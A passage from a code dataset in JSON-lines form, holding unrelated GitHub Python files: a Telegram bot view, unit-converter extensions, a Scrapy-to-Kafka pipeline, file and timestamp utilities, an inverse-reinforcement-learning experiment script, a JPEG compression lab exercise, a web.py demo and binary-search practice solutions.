Update.de_json(body)\n self.bot.process_new_updates([update])\n except Exception as e:\n logger.exception(\"Error occurred at parse TG request\")\n return HttpResponse(\"\", status=500)\n\n return HttpResponse(\"OK\")\n","repo_name":"DrMartiner/telegram_travel_bot","sub_path":"apps/bot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"46062583813","text":"# The poscUnits22.xml file is missing a few units which would be quite useful\n# This allows you to add additional units to the list.\nfrom __future__ import print_function, annotations\n\nimport decimal\n\nfrom . import convert\n\n\ndef register_pre(units):\n pass\n\n\ndef register_post(units):\n exponents = {\n 1024: (\n (0, '', ''),\n (1, 'ki', 'kibi'),\n (2, 'Mi', 'mebi'),\n (3, 'Gi', 'gibi'),\n (4, 'Ti', 'tebi'),\n (5, 'Pi', 'pebi'),\n ),\n 1000: (\n (0, '', ''),\n (1, 'k', 'kilo'),\n (2, 'M', 'mega'),\n (3, 'G', 'giga'),\n (4, 'T', 'tera'),\n (5, 'P', 'peta'),\n ),\n }\n\n for base, exponents in exponents.items():\n for exponent, prefix, full_prefix in exponents:\n multiplier = base**exponent\n\n params = dict(\n units=units,\n quantity_types=['digital storage'],\n )\n\n id_ = f'{prefix}bit'\n name = f'{full_prefix}bit'\n convert.Unit(\n base_unit='bit' if exponent else None,\n id=id_,\n name=name,\n annotations=[f'{prefix.lower()}b', f'{prefix}b', id_, name],\n conversion_params=('0', str(multiplier), '8', '0'),\n **params,\n ).register(units)\n\n id_ = f'{prefix}byte'\n name = f'{full_prefix}byte'\n convert.Unit(\n id=id_,\n name=name,\n base_unit='byte' if exponent else None,\n annotations=[f'{prefix.lower()}B', f'{prefix}B', id_, name],\n conversion_params=('0', str(multiplier), '1', '0'),\n **params,\n ).register(units)\n\n liter = units.get('L')\n liter.copy(\n units=units,\n id='teaspoon',\n name='teaspoon',\n annotations=['t', 'tsp'],\n conversion_params=('0', '0.000005', '1', '0'),\n fractional=True,\n ).register(units)\n liter.copy(\n units=units,\n id='tablespoon',\n name='tablespoon',\n annotations=['tbl', 'tbs', 'tbsp'],\n conversion_params=('0', '0.000015', '1', '0'),\n fractional=True,\n ).register(units)\n liter.copy(\n units=units,\n id='cup',\n name='cup',\n annotations=['cup'],\n conversion_params=('0', '0.000240', '1', '0'),\n fractional=True,\n ).register(units)\n\n units.get('in').fractional = True\n foot = units.get('ft')\n foot.split = 'in'\n foot.fractional = True\n\n prefixes = {\n ('milli', 'm'): decimal.Decimal('1e-3'),\n ('nano', 'n'): decimal.Decimal('1e-9'),\n }\n farad = units.get('farad')\n for prefixes, multiplier in prefixes.items():\n id_ = prefixes[1] + farad.id\n name = prefixes[0] + farad.name\n\n farad.copy(\n units=units,\n id=id_,\n name=name,\n annotations=[f'{prefix}f' for prefix in prefixes] + [id_, name],\n conversion_params=tuple(map(str, (0, multiplier, 1, 0))),\n ).register(units)\n\n hz = units.get('Hz')\n hz.conversion_params = tuple(units.get('cycles/second').conversion_params)\n hz.base_unit = 'radians/second'\n hz.register(units)\n","repo_name":"wolph/alfred-converter","sub_path":"converter/extra_units.py","file_name":"extra_units.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"19"} +{"seq_id":"12404391901","text":"'''\nCreated on 06-Apr-2020\n\n@author: srinivasan\n'''\nimport logging\nfrom scrapy.utils.serialize import ScrapyJSONEncoder\n\nlogger = logging.getLogger(__name__)\n\n\nclass KafkaPipeline:\n \n stats_name = 'KafkaPipeline'\n \n def __init__(self, settings, stats):\n from pykafka.client import KafkaClient\n self.stats = stats\n self.settings = settings\n self.encoder = ScrapyJSONEncoder()\n self.client = KafkaClient(hosts=settings.get('KAFKA_BOOTSTRAP_SERVERS'))\n self.producer = self.client.topics[bytes(settings.get('KAFKA_TOPIC_NAME'), 'ascii')]\\\n .get_sync_producer(min_queued_messages=1)\n \n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler.settings, crawler.stats)\n \n def process_item(self, item, spider):\n itemval = item if isinstance(item, dict) else dict(item)\n itemval['spider'] = spider.name\n self.producer.produce(bytes(self.encoder.encode(itemval),\n 'ascii'))\n self.stats.inc_value('{}/produce'.format(self.stats_name), spider=spider)\n logger.info(\"Item sent to Kafka\")\n return itemval\n \n def close_spider(self, spider):\n if self.producer:\n self.producer.stop()\n","repo_name":"gyan42/spark-streaming-playground","sub_path":"src/ssp/news_scrape/news_scrape/pipelines/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"17459542286","text":"import datetime\nimport os\nimport shutil\nimport sys\n\nclass WorkingDirectory(object):\n \"\"\"\n Change to a working directory and ensure that the old working directory is restored afterwards.\n \"\"\"\n def __init__(self, directory):\n self.directory = directory\n self.old_dir = os.getcwd()\n os.chdir(directory)\n def __enter__(self):\n return None\n def __exit__(self, type_, value_, traceback_):\n if type_:\n print(\"Error during processing in '%s'\" % self.directory, file=sys.stderr)\n os.chdir(self.old_dir)\n # return False to re-raise an occured exception\n return False\n\ndef get_timestamp_string(timestamp=None, file_name_compatible=False):\n \"\"\"\n Get a timestamp string for the given timestamp. When timestamp is None use the current time.\n \"\"\"\n if timestamp is None:\n timestamp = datetime.datetime.now()\n if file_name_compatible:\n return timestamp.strftime(\"%Y-%m-%d__%H_%M_%S\")\n else:\n return timestamp.strftime(\"%Y-%m-%d, %H:%M:%S\")\n\ndef convert_timestamp_string_to_timestamp(timestamp_string, file_name_compatible=False):\n \"\"\"\n The inverse operation for get_timestamp_string.\n \"\"\"\n if file_name_compatible:\n return datetime.datetime.strptime(timestamp_string, \"%Y-%m-%d__%H_%M_%S\")\n else:\n return datetime.datetime.strptime(timestamp_string, \"%Y-%m-%d, %H:%M:%S\")\n\ndef make_timestamped_backup_file(file_name, postfix=\"\", keep_old=True, bak_extension=\"\"):\n \"\"\"\n Create a backup file. Derive its backup file name from its last modification timestamp.\n \"\"\"\n if os.path.exists(file_name):\n file_timestamp = datetime.datetime.fromtimestamp(os.stat(file_name).st_mtime)\n TIME_STAMP_FORMAT = \"%Y-%m-%d_%H_%M_%S\"\n timestamp_string = file_timestamp.strftime(TIME_STAMP_FORMAT)\n file_base_name, file_ext = os.path.splitext(file_name)\n new_file_name = \"%s__%s%s%s%s\" % (file_base_name, timestamp_string, postfix, file_ext, bak_extension)\n if not os.path.exists(new_file_name):\n if keep_old:\n shutil.copy2(file_name, new_file_name)\n else:\n os.rename(file_name, new_file_name)\n else:\n from .Logging import Log\n Log().warning(\"'%s' does already exist\" % new_file_name)\n return new_file_name\n\ndef indent_text(text, indent=2):\n \"\"\"\n Indent the given text by indent spaces.\n \"\"\"\n prefix = \" \"*indent\n result = \"\"\n for line in text.split(\"\\n\"):\n result += \"%s%s\\n\" % (prefix, line)\n return result\n\ndef plural_s(decider):\n \"\"\"\n Return a plural 's' when the length of decider is != 1.\n \"\"\"\n if type(decider) == int:\n length = decider\n else:\n length = len(decider)\n if length == 1:\n return \"\"\n else:\n return \"s\"\n","repo_name":"novaspring/libmscboostpython","sub_path":"src/MscBoost/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25454668740","text":"import numpy as np\nimport numpy.random as random\nimport torch\nimport os\n\nfrom objectworld import ObjectWorld\nfrom binaryworld import BinaryWorld\nfrom sem import SEM\nfrom mcem import MCEM\nfrom mdp import MDP\nfrom drawing import Drawing\ntorch.manual_seed(0)\n\nmiirl_type = 'SEM' # either 'SEM' or 'MCEM', where 'SEM' : SEM-MIIRL and 'MCEM' : MCEM-MIIRL \ngame_type = 'ow' # either 'ow' or 'bw', where 'ow' : M-ObjectWorld and 'bw' : M-BinaryWorld\ncheckpoint_dir = './checkpoints'\nsample_length = 8 # the length of each demonstration sample\nalpha = 1 # concentration parameter\nsample_size = 16 # the number of demonstrations for each reward/intention\nrewards_types = ['A','B'] # intention/reward types which are in total six, ['A','B','C','D','E','F']\nmirl_maxiter = 200 # maximum number of iterations\n\nexp_n = 1\nseed = 1\n\n\ncheckpoint = {\n\n 'seed': [],\n 'game_type': [],\n 'miirl_type': [],\n 'game': [],\n 'model': [],\n 'rewards': [],\n 'rewards_types': [],\n 'rewardssquence' : [],\n 'linmodel_solutions': [],\n 'all_example_samples': [],\n 'n_samples' : [],\n 'mirl_solutions' : [],\n 'EVDs' : [],\n }\n\n\ncheckpoint_name = str(exp_n)+miirl_type+game_type\ncheckpoint_path = os.path.join(checkpoint_dir,checkpoint_name+'.pt')\nimage_path = os.path.join(checkpoint_dir,checkpoint_name+'.png')\n\nif game_type == 'ow':\n game = ObjectWorld(seed=seed)\nelif game_type == 'bw':\n game = BinaryWorld(seed=seed)\n\nmodel = MDP(game)\ncheckpoint['seed'] = seed\ncheckpoint['game_type'] = game_type\ncheckpoint['miirl_type'] = miirl_type\ncheckpoint['game'] = game\ncheckpoint['model'] = model\n\nprint('Saving game and model to {}'.format(checkpoint_path))\ntorch.save(checkpoint, checkpoint_path)\nprint('Done.')\n\nrewards = []\nlinmodel_solutions = []\nall_example_samples = []\nn_samples = []\n\nfor r in range(len(rewards_types)):\n reward = game.gamereward(rewards_types[r])\n linmodel_solution = model.linearmdpsolve(reward)\n n_sample = sample_size\n example_samples = model.sampleexamples(linmodel_solution, training_samples = n_sample, training_sample_length=sample_length)\n for i in range(len(example_samples)):\n all_example_samples.append(example_samples[i])\n rewards.append(reward)\n linmodel_solutions.append(linmodel_solution)\n n_samples.append(n_sample)\n\nif miirl_type == 'SEM':\n\n Mirl = SEM(\n game, rewards, model, linmodel_solutions, \n all_example_samples, n_samples, 1, alpha\n )\nelif miirl_type == 'MCEM':\n\n Mirl = MCEM(\n game, rewards, model, linmodel_solutions,\n all_example_samples, n_samples, 1, alpha\n )\n\nprint('solving for sample_size '+str(sample_size)+':')\nprint('solving for reward types '+str(rewards_types)+':')\nprint('MIRL training:')\n\nmirl_solutions, EVDs, rewardssquence = Mirl.momaxentrun(maxIter = mirl_maxiter)\n\nprint('MIRL training is finished')\nprint('Generating the picture ...')\nDrawing(game, rewards, rewardssquence, model, linmodel_solutions,all_example_samples, mirl_solutions,image_path)\n\ncheckpoint['rewards'] = rewards\ncheckpoint['rewards_types'] = rewards_types\ncheckpoint['rewardssquence'] = rewardssquence\ncheckpoint['linmodel_solutions'] = linmodel_solutions\ncheckpoint['all_example_samples'] = all_example_samples\ncheckpoint['n_samples'] = n_samples\ncheckpoint['mirl_solutions'] = mirl_solutions\ncheckpoint['EVDs'] = EVDs\nprint('Saving mirl solutions to {} ...'.format(checkpoint_path))\ntorch.save(checkpoint, checkpoint_path)\nprint('Done.')\n\n \n\n\n\n","repo_name":"tue-mps/damiirl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"6110442958","text":"#!/usr/bin/env python3\nimport zlib\nimport numpy\nimport lab4_utils as l4utils\nimport cv2 as cv\n\n# 0. Image data\ncolors_in_batch = 128\nbatches = 7\nimg_width = batches * colors_in_batch\nimg_height = 512\nimg_px_size = img_width * img_height\nr_versor = numpy.array([1, 0, 0], dtype=numpy.uint8)\ng_versor = numpy.array([0, 1, 0], dtype=numpy.uint8)\nb_versor = numpy.array([0, 0, 1], dtype=numpy.uint8)\nstep_size = 256 // colors_in_batch\ncurrent_color = numpy.array([0, 0, 0], dtype=numpy.uint8)\nimage = numpy.empty(shape=(img_height, img_width, 3), dtype=numpy.uint8)\nfor batch_idx in range(batches):\n current_op = None\n if batch_idx == 0:\n current_op = b_versor\n elif batch_idx == 1:\n current_op = g_versor\n elif batch_idx == 2:\n current_op = -b_versor\n elif batch_idx == 3:\n current_op = r_versor\n elif batch_idx == 4:\n current_op = -g_versor\n elif batch_idx == 5:\n current_op = b_versor\n elif batch_idx == 6:\n current_op = g_versor\n for step_idx in range(colors_in_batch):\n if step_idx == 0:\n current_color += (step_size - 1) * current_op\n else:\n current_color += step_size * current_op\n image[:, batch_idx * colors_in_batch + step_idx, :] = current_color\n\n# image: image, shape(height, width, 3), type(uint8)\nimg_bgr = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n\nlabel_before_compress = 'Before compression'\ncv.namedWindow(label_before_compress, cv.WINDOW_NORMAL)\ncv.imshow(label_before_compress, img_bgr)\n# cv.waitKey(0)\n# cv.destroyAllWindows()\n\n# 1. Convert RGB to YCbCr\nimg_yCrCb = cv.cvtColor(img_bgr, cv.COLOR_BGR2YCrCb)\nimg_y = img_yCrCb[:, :, 0]\nimg_Cr = img_yCrCb[:, :, 1]\nimg_Cb = img_yCrCb[:, :, 2]\n\n\n# 2. Downsampling on Cb Cr\ndef downsample(img_1ch, ratio):\n return img_1ch[::ratio, ::ratio].copy()\n\n\ndu_sample_ratio = 4\nimg_Cr_downsample = downsample(img_Cr, du_sample_ratio)\nimg_Cb_downsample = downsample(img_Cb, du_sample_ratio)\n\n\n# 3. Produce 8x8 blocks\ndef extract_blocks_8(img_1ch):\n n_y_step = img_1ch.shape[0] // 8\n n_x_step = img_1ch.shape[1] // 8\n blocks = numpy.empty(shape=(n_y_step * n_x_step, 8, 8), dtype=numpy.uint8)\n block_idx = 0\n for y in range(n_y_step):\n for x in range(n_x_step):\n blocks[block_idx, :, :] = img_1ch[y * 8:(y + 1) * 8, x * 8:(x + 1) * 8]\n block_idx += 1\n return blocks\n\n\nimg_y_8blocks = extract_blocks_8(img_y)\nimg_Cr_ds_8blocks = extract_blocks_8(img_Cr_downsample)\nimg_Cb_ds_8blocks = extract_blocks_8(img_Cb_downsample)\n\n\n# 4. Calculate DCT on each block\ndef dct_on_each_block(img_1ch_8b):\n result = numpy.empty(shape=img_1ch_8b.shape, dtype=numpy.float64)\n for i in range(img_1ch_8b.shape[0]):\n result[i, :, :] = l4utils.dct2(img_1ch_8b[i, :, :])\n return result\n\n\nimg_y_8b_dct = dct_on_each_block(img_y_8blocks)\nimg_Cr_ds_8b_dct = dct_on_each_block(img_Cr_ds_8blocks)\nimg_Cb_ds_8b_dct = dct_on_each_block(img_Cb_ds_8blocks)\n\n\n# 5. Divide each block by quantisation matrix\n# 6. Round each block to integers\ndef div_each_block_by_qmat(img_1ch_8b_dct, q_type, qf):\n result = numpy.empty(shape=img_1ch_8b_dct.shape, dtype=numpy.int16)\n for i in range(img_1ch_8b_dct.shape[0]):\n if q_type == 'qy':\n res = img_1ch_8b_dct[i, :, :] / l4utils.QY(qf)\n else:\n res = img_1ch_8b_dct[i, :, :] / l4utils.QC(qf)\n result[i, :, :] = numpy.around(res)\n return result\n\n\nquality_factor = 95\nimg_y_8b_dct_qr = div_each_block_by_qmat(img_y_8b_dct, 'qy', quality_factor)\nimg_Cr_ds_8b_dct_qr = div_each_block_by_qmat(img_Cr_ds_8b_dct, 'qc', quality_factor)\nimg_Cb_ds_8b_dct_qr = div_each_block_by_qmat(img_Cb_ds_8b_dct, 'qc', quality_factor)\n\n\n# 7. Zig Zag\ndef zigzag(img_1ch):\n result = [[] for _ in range(img_1ch.shape[0] + img_1ch.shape[1] - 1)]\n for y in range(img_1ch.shape[0]):\n for x in range(img_1ch.shape[1]):\n idx_sum = y + x\n if idx_sum % 2 == 0:\n result[idx_sum].insert(0, img_1ch[y, x])\n else:\n result[idx_sum].append(img_1ch[y, x])\n flattened_numpy_result = numpy.empty(shape=img_1ch.shape[0] * img_1ch.shape[1], dtype=numpy.uint8)\n\n next_idx = 0\n for sublist in result:\n for item in sublist:\n flattened_numpy_result[next_idx] = item\n next_idx += 1\n\n return flattened_numpy_result\n\n\nimg_y_zz = zigzag(img_y)\nimg_Cr_ds_zz = zigzag(img_Cr_downsample)\nimg_Cb_ds_zz = zigzag(img_Cb_downsample)\n\n# 8. Flatten, concatenate, compress and calculate the size -- how many bytes?\nimg_flat_concat = numpy.empty(shape=img_y_zz.shape[0] + img_Cr_ds_zz.shape[0] + img_Cb_ds_zz.shape[0],\n dtype=numpy.uint8)\nifc_lim_0 = 0\nifc_lim_1 = ifc_lim_0 + img_y_zz.size\nifc_lim_2 = ifc_lim_1 + img_Cr_ds_zz.size\nifc_lim_3 = ifc_lim_2 + img_Cb_ds_zz.size\nimg_flat_concat[ifc_lim_0:ifc_lim_1] = img_y_zz\nimg_flat_concat[ifc_lim_1:ifc_lim_2] = img_Cr_ds_zz\nimg_flat_concat[ifc_lim_2:ifc_lim_3] = img_Cb_ds_zz\n\ncmpsd_img_flat_concat = zlib.compress(img_flat_concat.tobytes(), level=9)\n# print('Approximated size of the compressed image: {0} B'.format(len(cmpsd_img_flat_concat)))\n\njpeg_img_data = img_y_8b_dct_qr.tobytes() + img_Cr_ds_8b_dct_qr.tobytes() + img_Cb_ds_8b_dct_qr.tobytes()\ncmpsd_jpeg_img_data = zlib.compress(jpeg_img_data, level=9)\nprint('Approximated size of the compressed jpeg image: {0} B'.format(len(cmpsd_jpeg_img_data)))\n\n\n# 7'. Undo Zig Zag\n# We can skip it in this exercise!\n\n# 6'. Nothing to do here ¯\\_(ツ)_/¯\n# For the next step, just reuse the rounded data obtained in step 6.\n\n# 5'. Reverse division by quantisation matrix -- multiply\ndef mult_each_block_by_qmat(img_1ch_8b_dct_qr, q_type, qf):\n result = numpy.empty(shape=img_1ch_8b_dct_qr.shape, dtype=numpy.int16)\n for i in range(img_1ch_8b_dct_qr.shape[0]):\n if q_type == 'qy':\n result[i, :, :] = img_1ch_8b_dct_qr[i, :, :] * l4utils.QY(qf)\n else:\n result[i, :, :] = img_1ch_8b_dct_qr[i, :, :] * l4utils.QC(qf)\n return result\n\n\nr_img_y_8b_dct_qr = mult_each_block_by_qmat(img_y_8b_dct_qr, 'qy', quality_factor)\nr_img_Cr_ds_8b_dct_qr = mult_each_block_by_qmat(img_Cr_ds_8b_dct_qr, 'qc', quality_factor)\nr_img_Cb_ds_8b_dct_qr = mult_each_block_by_qmat(img_Cb_ds_8b_dct_qr, 'qc', quality_factor)\n\n\n# 4'. Reverse DCT\ndef idct_on_each_block(img_1ch_8b_dct):\n result = numpy.empty(shape=img_1ch_8b_dct.shape, dtype=numpy.uint8)\n for i in range(img_1ch_8b_dct.shape[0]):\n res = l4utils.idct2(img_1ch_8b_dct[i, :, :])\n result[i, :, :] = numpy.around(res)\n return result\n\n\nr_img_y_8b_dct = idct_on_each_block(r_img_y_8b_dct_qr)\nr_img_Cr_ds_8b_dct = idct_on_each_block(r_img_Cr_ds_8b_dct_qr)\nr_img_Cb_ds_8b_dct = idct_on_each_block(r_img_Cb_ds_8b_dct_qr)\n\n\n# 3'. Combine 8x8 blocks to original image\ndef combine_blocks_8(img_1ch_8b, original_shape):\n n_y_step = original_shape[0] // 8\n n_x_step = original_shape[1] // 8\n result = numpy.empty(shape=original_shape, dtype=numpy.uint8)\n result_idx = 0\n for y in range(n_y_step):\n for x in range(n_x_step):\n result[y * 8:(y + 1) * 8, x * 8:(x + 1) * 8] = img_1ch_8b[result_idx, :, :]\n result_idx += 1\n return result\n\n\nr_img_y_8blocks = combine_blocks_8(r_img_y_8b_dct, img_y.shape)\nr_img_Cr_ds_8blocks = combine_blocks_8(r_img_Cr_ds_8b_dct, img_Cr_downsample.shape)\nr_img_Cb_ds_8blocks = combine_blocks_8(r_img_Cb_ds_8b_dct, img_Cb_downsample.shape)\n\n\n# 2'. Upsampling on Cb Cr\ndef upsample(downs_img, ratio):\n ups_img = numpy.empty(shape=(downs_img.shape[0] * ratio, downs_img.shape[1] * ratio), dtype=numpy.uint8)\n for y in range(ups_img.shape[0]):\n for x in range(ups_img.shape[1]):\n ups_img[y][x] = downs_img[y // ratio][x // ratio]\n return ups_img\n\n\n# img_Cr_upsample = upsample(img_Cr_downsample, du_sample_ratio)\n# img_Cb_upsample = upsample(img_Cb_downsample, du_sample_ratio)\nr_img_Cr_up = upsample(r_img_Cr_ds_8blocks, du_sample_ratio)\nr_img_Cb_up = upsample(r_img_Cb_ds_8blocks, du_sample_ratio)\n\n# 1'. Convert YCbCr to RGB\nreconstructed_img_yCrCb = numpy.empty(shape=img_yCrCb.shape, dtype=numpy.uint8)\n# reconstructed_img_yCrCb[:, :, 0] = img_y\n# reconstructed_img_yCrCb[:, :, 1] = img_Cr_upsample\n# reconstructed_img_yCrCb[:, :, 2] = img_Cb_upsample\nreconstructed_img_yCrCb[:, :, 0] = r_img_y_8blocks\nreconstructed_img_yCrCb[:, :, 1] = r_img_Cr_up\nreconstructed_img_yCrCb[:, :, 2] = r_img_Cb_up\n\nreconstructed_img_bgr = cv.cvtColor(reconstructed_img_yCrCb, cv.COLOR_YCrCb2BGR)\n\n# 0'. Save the decoded image -- as PPM or PNG\ncv.imwrite('lab4-jpeg-result.png', reconstructed_img_bgr, [cv.IMWRITE_PNG_COMPRESSION, 9])\nlabel_after_compress = 'After compression'\ncv.namedWindow(label_after_compress, cv.WINDOW_NORMAL)\ncv.imshow(label_after_compress, reconstructed_img_bgr)\ncv.waitKey(0)\ncv.destroyAllWindows()\n\n# Notatka do zadania 4\n# Bez próbkowania: rozmiar - 15589 B, brak zauważalnej różnicy w wyglądzie\n# Co 2 piksel: rozmiar - 9224 B, brak zauważalnej różnicy w wyglądzie\n# Co 4 piksel: rozmiar - 7129 B, brak zauważalnej różnicy w wyglądzie\n# Co 64 piksel: rozmiar - 5311 B, ciężko nie zauważyć różnicy :)\n# Podsumowując, etap downsamplingu istotnie zmniejsza wielkość pliku przy niezauważalnych stratach jakości zdjęcia\n# (zakładając niewielki krok próbkowania).\n# Zbyt rzadkie próbkowanie nie przynosi znaczącego zysku w zajętości miejsca na dysku, zaś może znacznie wpłynąć\n# na jakość obrazka.\n# Wydaje się, że krok równy 4px jest krokiem dobrym (strata nie jest jeszcze widoczna).\n\n# Notatka do zadania 5\n# (próbkowanie co 4 piksele)\n# QF = 99: rozmiar - 8719 B, brak zauważalnej różnicy w wyglądzie\n# QF = 95: rozmiar - 8681 B, brak zauważalnej różnicy w wyglądzie\n# QF = 50: rozmiar - 8320 B, pojawiły się pionowe artefakty, zauważalne pogorszenie jakości\n# QF = 10: rozmiar - 7433 B, pojawiły się pionowe artefakty, obraz wyraźnie gorszej jakości\n# Wraz ze spadkiem wartości współczynnika qf maleje rozmiar zdjęcia oraz spada jego jakość.\n# Przy wysokich wartościach QF (okolice 95) spadek jakości nie jest zauważalny na pierwszy rzut oka, a nawet\n# ciężko dostrzec różnicę dokładnie analizując obraz.\n# Zaskakuje fakt, że rozmiar zdjęcia potraktowanego (uproszczonym) algorytmem jpeg jest większy, niż oryginalnie.\n# Może to wynikać ze specyfiki obrazka - algorytm kompresji akurat w tym wypadku radzi sobie lepiej\n# z obrazkiem nieprzetworzonym.\n","repo_name":"plonajakub/image-engineering","sub_path":"lab4/lab4-jpeg.py","file_name":"lab4-jpeg.py","file_ext":"py","file_size_in_byte":10509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22707691774","text":"import web\n\nurls = (\n '/', 'hello',\n '/bye/', 'bye')\n\napp = web.application(urls, globals(), True)\n\nrender = web.template.render('templates/')\n\nclass hello:\n def GET(self):\n return render.hello(\"Templates demo\", \"Hello\", \"A long time ago...\")\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"meghapanda/Indoor-Air-Quality","sub_path":"bin/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70717572843","text":"# https://www.codingninjas.com/studio/problems/binary-search_972?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n#### Base of binary search\ndef search(nums: [int], target: int):\n # Write your code here.\n\n low = 0\n high = len(nums) - 1\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n\n return -1\n\n# https://www.canva.com/design/DADRwAjhxF0/Z21tg8BQ4Dyy5wGJclxWbA/edit?category=tACZCk6N0I4&utm_source=onboarding\ndef lowerBound(arr: [int], n: int, x: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = len(arr)\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] >= x:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n# https://www.codingninjas.com/studio/problems/implement-upper-bound_8165383?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef upperBound(arr: [int], x: int, n: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = len(arr)\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] > x:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n# https://www.codingninjas.com/studio/problems/algorithm-to-find-best-insert-position-in-sorted-array_839813?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef searchInsert(arr: [int], m: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = len(arr)\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] >= m:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n\ndef ceil(arr, x, n):\n\n low = 0\n high = n - 1\n ans = n\n\n while low <= high:\n\n mid = (low + high) //2\n\n if arr[mid] >= x:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n \n return ans \n\ndef floor(arr, x, n):\n\n low = 0\n high = n - 1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] <= x:\n ans = mid\n low = mid + 1\n else:\n high = mid - 1\n \n return ans \n\ndef ceilingInSortedArray(n, x, arr):\n\n arr.sort()\n\n floor_idx = floor(arr, x, n)\n ceil_idx = ceil(arr, x, n)\n \n a, b = [-1, n]\n\n if floor_idx != -1:\n a = arr[floor_idx]\n\n if ceil_idx != n:\n b = arr[ceil_idx]\n\n return ''.join(map( lambda x: str(x),[a, b]))\n\n\n# https://www.codingninjas.com/studio/problems/first-and-last-position-of-an-element-in-sorted-array_1082549?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef first_occur(arr: [int], n: int, x: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n high = mid - 1\n elif arr[mid] > x:\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\ndef last_occur(arr: [int], n: int, x: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = n - 1\n ans = n \n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n low = mid + 1\n elif arr[mid] > x:\n high = mid - 1\n else:\n low = mid + 1\n\n return ans \n\ndef firstAndLastPosition(arr, n, k):\n\n ####first occurance is equal to lower_bound \n ####last occurance is equal to upper_bound - 1\n\n\n a = first_occur(arr, n , k)\n\n if a == -1:\n return -1, -1\n\n b = last_occur(arr, n, k)\n\n return a, b\n\n\ndef first_occur(arr: [int], n: int, x: int) -> int:\n\n low = 0\n high = len(arr) - 1\n ans = 0\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n high = mid - 1\n elif arr[mid] > x:\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\ndef last_occur(arr: [int], n: int, x: int) -> int:\n\n low = 0\n high = n - 1\n ans = 0\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n low = mid + 1\n elif arr[mid] > x:\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n\ndef count(arr: [int], n: int, x: int) -> int:\n # Your code goes here\n\n last_idx = last_occur(arr, n , x)\n first_idx = first_occur(arr, n, x)\n\n if last_idx == first_idx == 0:\n return 0\n\n return last_idx - first_idx + 1\n\n\n\ndef binary_search(arr, n, x):\n\n low = 0\n high = n - 1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] == x:\n return mid\n \n elif arr[mid] > x:\n high = mid - 1\n \n else:\n low = mid + 1\n\n\n return ans\n\n\n\ndef count(arr: [int], n: int, x: int) -> int:\n # Your code goes here\n\n idx = binary_search(arr, n , x)\n\n if idx == -1: return 0\n\n # print(idx)\n\n ###searching in left side\n ans = 1\n\n left = idx - 1\n\n while left >= 0 and arr[left] == x:\n ans += 1\n left -= 1\n\n ### searching in right side\n right = idx + 1\n\n while right < n and arr[right] == x:\n ans += 1\n right += 1\n\n return ans\n\n\n# https://www.codingninjas.com/studio/problems/search-in-rotated-sorted-array_1082554?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef search_rotated_array_1(arr, n, k):\n\t\n\tlow = 0\n\thigh = n - 1\n\n\twhile low <= high:\n\n\t\tmid = (low + high) // 2\n\n\t\tif arr[mid] == k:\n\t\t\treturn mid \n\t\t\n\t\t###find the sorted part \n\t\t\n\t\tif arr[low] <= arr[mid]:\n\t\t\t###fist part is sorted\n\n\t\t\t### now 